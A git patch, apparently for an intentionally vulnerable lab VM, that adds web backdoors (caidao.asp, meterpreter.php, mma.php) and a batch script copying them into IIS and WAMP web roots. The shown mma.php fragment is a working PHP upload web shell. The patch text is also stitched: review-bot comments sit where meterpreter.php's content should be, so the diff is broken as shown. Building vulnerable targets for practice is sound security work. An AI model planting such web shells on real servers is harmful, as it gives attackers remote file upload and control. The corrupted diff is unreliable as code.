From 5711ad8e29274cdf3a568dc35e5ad2bbe3f2298b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 25 Oct 2016 14:48:21 -0500 Subject: [PATCH] Add common backdoors --- Vagrantfile | 8 ++++---- resources/{caidao => backdoors}/caidao.asp | 0 resources/backdoors/meterpreter.php | 1 + resources/backdoors/mma.php | 9 +++++++++ scripts/installs/install_backdoors.bat | 3 +++ scripts/installs/setup_caidao.bat | 1 - 6 files changed, 17 insertions(+), 5 deletions(-) rename resources/{caidao => backdoors}/caidao.asp (100%) create mode 100644 resources/backdoors/meterpreter.php create mode 100644 resources/backdoors/mma.php create mode 100644 scripts/installs/install_backdoors.bat delete mode 100644 scripts/installs/setup_caidao.bat diff --git a/Vagrantfile b/Vagrantfile index 3cc95eb..bcd9c69 100644 --- a/Vagrantfile +++ b/Vagrantfile @@ -33,10 +33,6 @@ Vagrant.configure("2") do |config| config.vm.provision :shell, path: "scripts/installs/setup_ftp_site.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 - # Vulnerability - Chinese caidao.asp backdoor - config.vm.provision :shell, path: "scripts/installs/setup_caidao.bat" - config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 - # Vulnerability - Setup for Apache Struts config.vm.provision :shell, path: "scripts/chocolatey_installs/java.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 
@@ -100,6 +96,10 @@ Vagrant.configure("2") do |config| config.vm.provision :shell, path: "scripts/installs/setup_axis2.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 + # Vulnerability - Chinese caidao.asp backdoor + config.vm.provision :shell, path: "scripts/installs/install_backdoors.bat" + config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 + # Configure Firewall to open up vulnerable services config.vm.provision :shell, path: "scripts/configs/configure_firewall.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 diff --git a/resources/caidao/caidao.asp b/resources/backdoors/caidao.asp similarity index 100% rename from resources/caidao/caidao.asp rename to resources/backdoors/caidao.asp diff --git a/resources/backdoors/meterpreter.php b/resources/backdoors/meterpreter.php new file mode 100644 index 0000000..20c75ce --- /dev/null +++ b/resources/backdoors/meterpreter.php @@ -0,0 +1 @@ +/*
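Review bot: The comment on the block added to the Vagrantfile, `# Vulnerability - Chinese caidao.asp backdoor`, no longer matches what the step does, because it now runs `scripts/installs/install_backdoors.bat`, which copies caidao.asp, mma.php and meterpreter.php. A comment such as `# Vulnerability - Web backdoors (caidao.asp, mma.php, meterpreter.php)` keeps the inventory of planted artifacts accurate for anyone who builds detections or a cleanup checklist from this file. The block was also moved below the Axis2 setup, presumably so that `C:\wamp\www` exists before the copy runs. If so, a one-line comment stating that ordering dependency would keep a later reorder from silently breaking it. The enclosing `Vagrant.configure` block starts and ends outside the hunk.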

'.php_uname().'
'; +echo '
'; +echo '
'; +if( $_POST['_upl'] == "Upload" ) { +if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'uplod d0n3 in SAME file // Th3 MMA \\

'; } +else { echo 'Upload GAGAL !!!

';
+} }
+?>
diff --git a/scripts/installs/install_backdoors.bat b/scripts/installs/install_backdoors.bat
new file mode 100644
index 0000000..1d35754
--- /dev/null
+++ b/scripts/installs/install_backdoors.bat
@@ -0,0 +1,3 @@
+copy C:\vagrant\resources\backdoors\caidao.asp "C:\inetpub\wwwroot"
+copy C:\vagrant\resources\backdoors\mma.php "C:\wamp\www"
+copy C:\vagrant\resources\backdoors\meterpreter.php "C:\wamp\www"
diff --git a/scripts/installs/setup_caidao.bat b/scripts/installs/setup_caidao.bat
deleted file mode 100644
index daa3fb8..0000000
--- a/scripts/installs/setup_caidao.bat
+++ /dev/null
@@ -1 +0,0 @@
-copy C:\vagrant\resources\caidao\caidao.asp "C:\inetpub\wwwroot"
\ No newline at end of file
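Review bot: The three `copy` commands in scripts/installs/install_backdoors.bat check neither that the destination exists nor that the copy succeeded, so a partly provisioned image can look complete. If `C:\wamp` exists but `www` does not when this runs, `copy` treats `"C:\wamp\www"` as a file name and writes the payload there instead of failing. The script's exit status is also only that of the last command, so a failure of the first two copies would likely not reach the provisioner. Guarding the destinations and failing fast would fix both, for example `if not exist "C:\wamp\www\" exit /b 1` before the PHP copies and `|| exit /b 1` appended to each `copy` line. A leading `rem` line naming the three files and their target web roots would also make the lab's planted artifacts easy to enumerate when the image is audited or torn down.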